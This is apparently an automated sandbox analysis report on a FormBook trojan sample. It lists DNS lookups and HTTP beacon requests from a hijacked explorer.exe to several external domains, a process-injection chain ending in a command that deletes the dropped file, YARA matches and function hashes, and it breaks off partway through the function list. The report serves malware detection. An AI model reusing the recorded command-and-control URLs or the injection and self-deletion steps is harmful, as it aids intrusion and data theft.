Jun 10, 2021 16:58:45.600503922 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:54.166132927 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:54.234509945 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:54.406909943 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:54.467139006 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 10, 2021 16:58:56.880532980 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:58:56.941210985 CEST	53	52752	8.8.8.8	192.168.2.4
Jun 10, 2021 16:59:34.884417057 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:59:34.958528042 CEST	53	60542	8.8.8.8	192.168.2.4
Jun 10, 2021 16:59:36.889569044 CEST	60689	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:59:36.957350016 CEST	53	60689	8.8.8.8	192.168.2.4
Jun 10, 2021 16:59:51.350280046 CEST	64206	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:59:51.418663025 CEST	53	64206	8.8.8.8	192.168.2.4
Jun 10, 2021 16:59:56.618190050 CEST	50904	53	192.168.2.4	8.8.8.8
Jun 10, 2021 16:59:56.776873112 CEST	53	50904	8.8.8.8	192.168.2.4
Jun 10, 2021 17:00:02.063884974 CEST	57525	53	192.168.2.4	8.8.8.8
Jun 10, 2021 17:00:02.214797020 CEST	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 16:59:51.350280046 CEST	192.168.2.4	8.8.8.8	0x5b59	Standard query (0)	www.granthamrobotics.com	A (IP address)	IN (0x0001)
Jun 10, 2021 16:59:56.618190050 CEST	192.168.2.4	8.8.8.8	0x567	Standard query (0)	www.mclpay.com	A (IP address)	IN (0x0001)
Jun 10, 2021 17:00:02.063884974 CEST	192.168.2.4	8.8.8.8	0xd155	Standard query (0)	www.stealthshop.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 16:59:51.418663025 CEST	8.8.8.8	192.168.2.4	0x5b59	No error (0)	www.granthamrobotics.com	granthamrobotics.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 16:59:51.418663025 CEST	8.8.8.8	192.168.2.4	0x5b59	No error (0)	granthamrobotics.com		34.102.136.180	A (IP address)	IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST	8.8.8.8	192.168.2.4	0x567	No error (0)	www.mclpay.com	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST	8.8.8.8	192.168.2.4	0x567	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		13.59.53.244	A (IP address)	IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST	8.8.8.8	192.168.2.4	0x567	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		52.14.32.15	A (IP address)	IN (0x0001)
Jun 10, 2021 16:59:56.776873112 CEST	8.8.8.8	192.168.2.4	0x567	No error (0)	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com		3.143.65.214	A (IP address)	IN (0x0001)
Jun 10, 2021 17:00:02.214797020 CEST	8.8.8.8	192.168.2.4	0xd155	No error (0)	www.stealthshop.net		74.220.199.6	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.granthamrobotics.com

www.mclpay.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49766	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 16:59:51.470333099 CEST	5054	OUT	GET /sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP HTTP/1.1 Host: www.granthamrobotics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 16:59:51.608155966 CEST	5055	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 10 Jun 2021 14:59:51 GMT Content-Type: text/html Content-Length: 275 ETag: "60ba413e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49767	13.59.53.244	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 16:59:56.918880939 CEST	5056	OUT	GET /sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp HTTP/1.1 Host: www.mclpay.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 16:59:57.059190989 CEST	5056	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Jun 2021 14:59:57 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe PID: 6916 Parent PID: 5892

General

Start time:	16:57:55
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe'
Imagebase:	0x3a0000
File size:	557568 bytes
MD5 hash:	4E9095CEADD56BC68A99947AB929F691
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: AddInProcess32.exe PID: 6200 Parent PID: 6916

General

Start time:	16:58:37
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase:	0xcd0000
File size:	42080 bytes
MD5 hash:	F2A47587431C466535F3C3D3427724BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6200

General

Start time:	16:58:42
Start date:	10/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: systray.exe PID: 2108 Parent PID: 3424

General

Start time:	16:59:10
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0x1c0000
File size:	9728 bytes
MD5 hash:	1373D481BE4C8A6E5F5030D2FB0A0C68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4812 Parent PID: 2108

General

Start time:	16:59:15
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5964 Parent PID: 4812

General

Start time:	16:59:15
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe PID: 6916 Parent PID: 5892 SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCOMMON

Executed Functions

Function 0662237C, Relevance: 1.8, APIs: 1, Instructions: 253processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,06629925,?,?,?), ref: 06629BCC

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 20c9182affc0e9efb6395e3a011f2467d08fe4d42338f1c20f74a81b7a055985
Instruction ID: 10934a1b1799fe555f26969869e0e73f418f605027414b751baa145d318eed4d
Opcode Fuzzy Hash: 20c9182affc0e9efb6395e3a011f2467d08fe4d42338f1c20f74a81b7a055985
Instruction Fuzzy Hash: 1B91EF74D0422D9FDB25CFA5C880BDDBBF1BB5A304F0491AAE549B7210DB70AA85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0272EE90, Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246990c56d4a405773fbeb89724aab6ceae63d8075e413e73805544ce98e47f6
Instruction ID: 3c946cef447a9e3ede33ca32bc1feb46704fae7e2f3fa013b03ff7c0e4d812dc
Opcode Fuzzy Hash: 246990c56d4a405773fbeb89724aab6ceae63d8075e413e73805544ce98e47f6
Instruction Fuzzy Hash: 6F22F475A00228DFDB65CFA4C944F99BBB2FF48304F1580E9E609AB262CB319D95DF11

Uniqueness

Uniqueness Score: -1.00%

Function 0272C5C0, Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba2c8494ba8125f51d38854db58186749597e7d539f1c59b373872414b48a58
Instruction ID: 7e766bd96d20467ff61bf34f2d13e94bede889297405522ce6fccce176374e2b
Opcode Fuzzy Hash: 7ba2c8494ba8125f51d38854db58186749597e7d539f1c59b373872414b48a58
Instruction Fuzzy Hash: 38D1FF34F04264CBEB16DBA8C4557AE77B2EB98304F16802BD506EB380DB78DD49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0272BB98, Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e16b1776fb0f9cb70d8b9c519a267a867e027cffc6bb8afa44658da1d806b0df
Instruction ID: 4d89fc8fe98d65a55f8d761b78defb3ebbb994e484a3fc3ce8908158a8090509
Opcode Fuzzy Hash: e16b1776fb0f9cb70d8b9c519a267a867e027cffc6bb8afa44658da1d806b0df
Instruction Fuzzy Hash: E0B1597070D2645BE709AA758C5477F7767DBC5308F14A07AE106DB386CF788C4A8B62

Uniqueness

Uniqueness Score: -1.00%

Function 06621B18, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5142ba63c7ef50f120ad2a164174d3832812d7b2001d8280b09ef96d7bde8be
Instruction ID: c77cfc8c9bda30cb3cba0567182486cd19606b5864636aba422b58d218e1774c
Opcode Fuzzy Hash: d5142ba63c7ef50f120ad2a164174d3832812d7b2001d8280b09ef96d7bde8be
Instruction Fuzzy Hash: 6681F274E045099FCB48DFA9D880A9DFBF2EF89304F24C02AD919AB355DB31A942CF41

Uniqueness

Uniqueness Score: -1.00%

Function 027280C0, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7706d413c933c8f6c7a115baf55bf4cda7ccf973e693ed76f70dc827fe5cafd1
Instruction ID: 92ca4666e73902019e1a7c6e32e292c1b93eef4e7afe65521fb3890bad2a1762
Opcode Fuzzy Hash: 7706d413c933c8f6c7a115baf55bf4cda7ccf973e693ed76f70dc827fe5cafd1
Instruction Fuzzy Hash: C21191357082186BE768EAB58C95B2BB15BA7C8700F14803DA20BD3284DE7998061665

Uniqueness

Uniqueness Score: -1.00%

Function 066209A8, Relevance: 1.8, APIs: 1, Instructions: 270COMMON

Download Yara Rule

APIs

CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 06620C49

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 2fd861f6bb65d2a8c0c41f23a690ce4da29bbcb063dfa23e3d78a2471b6e645b
Instruction ID: 8764412822de79a11039dfca701c83a40e399dedb62f5825805cb640b1f2638b
Opcode Fuzzy Hash: 2fd861f6bb65d2a8c0c41f23a690ce4da29bbcb063dfa23e3d78a2471b6e645b
Instruction Fuzzy Hash: E6C1F274E00229DFDB64CFA9C981B9DBBB2BF49304F1085A9E819B7351DB34A981CF54

Uniqueness

Uniqueness Score: -1.00%

Function 066222F0, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0662791F

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e801df3e9c3e71aa6cbeb830af12da1265d6c152e76963f1c83612d2a25a7e18
Instruction ID: 940431607daf9a302b6e197d3cd57f0ffd6863929acc33a2b49ec418b2888636
Opcode Fuzzy Hash: e801df3e9c3e71aa6cbeb830af12da1265d6c152e76963f1c83612d2a25a7e18
Instruction Fuzzy Hash: B0319AB9D04259AFCB10CFA9D484AEEFBB4BB19310F14902AE815B7310D774A955CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 066231D0, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 06623277

Memory Dump Source

Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true

Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 05d6c913f8f563e9fd386d7a5013de63a54dcb40ed63cb02f47246c0bac20325
Instruction ID: b33f7729e207c912d5870e4f99ebf64db7a9b65d299c045d4ab8910d29cf5864
Opcode Fuzzy Hash: 05d6c913f8f563e9fd386d7a5013de63a54dcb40ed63cb02f47246c0bac20325
Instruction Fuzzy Hash: 703199B5D04258AFCF10CFA9E884ADEFBB0BB19310F14902AE814B7310D778A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0272B488, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2ce259d9ba470ca18ddd89e4708b57299aec388760524fba40aa4622f22add
Instruction ID: 35046a19830b2f93f12983712fc1c17accea4df16e11d9a064f91086e4a3374f
Opcode Fuzzy Hash: 7f2ce259d9ba470ca18ddd89e4708b57299aec388760524fba40aa4622f22add
Instruction Fuzzy Hash: 7B714831B082A18FC7209F79C4A076EBBB6EF86308F119136D5259B395CA34DD45C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0272EB30, Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e06170ab9fdfdb605656f9170a250c674a945be0ecfa17f423b7b589db66dd4
Instruction ID: 3c39b14490d9a197a8f3907413ac4897080f5ffcb24ea545d77461132bddfd39
Opcode Fuzzy Hash: 2e06170ab9fdfdb605656f9170a250c674a945be0ecfa17f423b7b589db66dd4
Instruction Fuzzy Hash: C871D270A05218CFDB05CFA8D884BAEBBF2FB89304F14942AE516FB391C735A945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0272DB70, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe941fd2de30b4ee2c31eba37066c73c7be850fe83a40cb1838686738af4d326
Instruction ID: c40cc3956fa59dd4fc2c2c95001713ac090c5db14df9bad4d7b3c3aeaf2489c6
Opcode Fuzzy Hash: fe941fd2de30b4ee2c31eba37066c73c7be850fe83a40cb1838686738af4d326
Instruction Fuzzy Hash: AC416734708210DBF734AA75C82577AB6A2EBC6340F14C07AD5029B385DFB6CD46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0272F9D0, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eeb87f3f4241cc8295c2305a292654c672eeb802d41e70c68c24f108f37f9bf
Instruction ID: 2e69be10ad6463b35cc5f484e1cb30a3b2f110f16efa5216f7fc0f6616c46516
Opcode Fuzzy Hash: 6eeb87f3f4241cc8295c2305a292654c672eeb802d41e70c68c24f108f37f9bf
Instruction Fuzzy Hash: 8441F974E00208DFDB48DFA9D494AADB7F2FB88304F24C12AD819A7395DB35A946CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0272EC80, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e171f72135df358b25891f3bdf57a0615c0303e83ca265808812b0b9e253434
Instruction ID: 4d6eaef9e03993f23cd0cc6c9b4320a965a83cb36e0d033e0e0db8a3ed56acc4
Opcode Fuzzy Hash: 8e171f72135df358b25891f3bdf57a0615c0303e83ca265808812b0b9e253434
Instruction Fuzzy Hash: E5316974A04108DFDB44DFA8D4906AEBBF1EB89314F24D41AD91AB7384D731A942CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0272CE80, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0255c1d6ed2934674e095ff673f285b30bb4609eb26fa725134efe45fee962
Instruction ID: ac56eface1909d4bf608a06037ffe9b9317ece55dc41ab9a156742d689941131
Opcode Fuzzy Hash: 5d0255c1d6ed2934674e095ff673f285b30bb4609eb26fa725134efe45fee962
Instruction Fuzzy Hash: B921F571A081658FC712CFA8C84176EFBA5EB69304F06897FE259DB251C334CA5CC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D3B4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666ff2a6c02a6921ffb0691eb0cc78c5ab77c1311ac32c962064cabb6fcb5392
Instruction ID: 6b7220f88918cae85644192ba5cfaf5c1edfa9cf1b71f83486b756a767de742a
Opcode Fuzzy Hash: 666ff2a6c02a6921ffb0691eb0cc78c5ab77c1311ac32c962064cabb6fcb5392
Instruction Fuzzy Hash: 642148B1508240EFDB00CF10DCC0B56BB75FF94328F24C5A9E9096B246C336E846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0272BCB0, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd53dd86934dfc96644120ae5687084b2d07aa93f95cb4c6873b15ea20ea0659
Instruction ID: 4d54ef07d8d9e047693ca1b38203e9e1d1c9128f4aa0f74d219796f366a89b95
Opcode Fuzzy Hash: bd53dd86934dfc96644120ae5687084b2d07aa93f95cb4c6873b15ea20ea0659
Instruction Fuzzy Hash: 76210435605220DBD7108B56C848BB977B6EF8430CF28E07AE505DB385DB7A8C4ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0272EA28, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e15328522a760ed37e5b9153a6b514937c9281e272d74c62e61a3c7c8cc850
Instruction ID: d988fd697308f4d4256581a299a549ac7f952b9576f4cca833428a846490f1f2
Opcode Fuzzy Hash: 95e15328522a760ed37e5b9153a6b514937c9281e272d74c62e61a3c7c8cc850
Instruction Fuzzy Hash: 1011E630B483219BFA3585A58817F3A72A7E781B40F15843AD5079BB84DE71FC09C396

Uniqueness

Uniqueness Score: -1.00%

Function 0272D298, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3880fe7f93f54ecf14c6970d175802041cdb5470c6e3760a26ea912497e77fe7
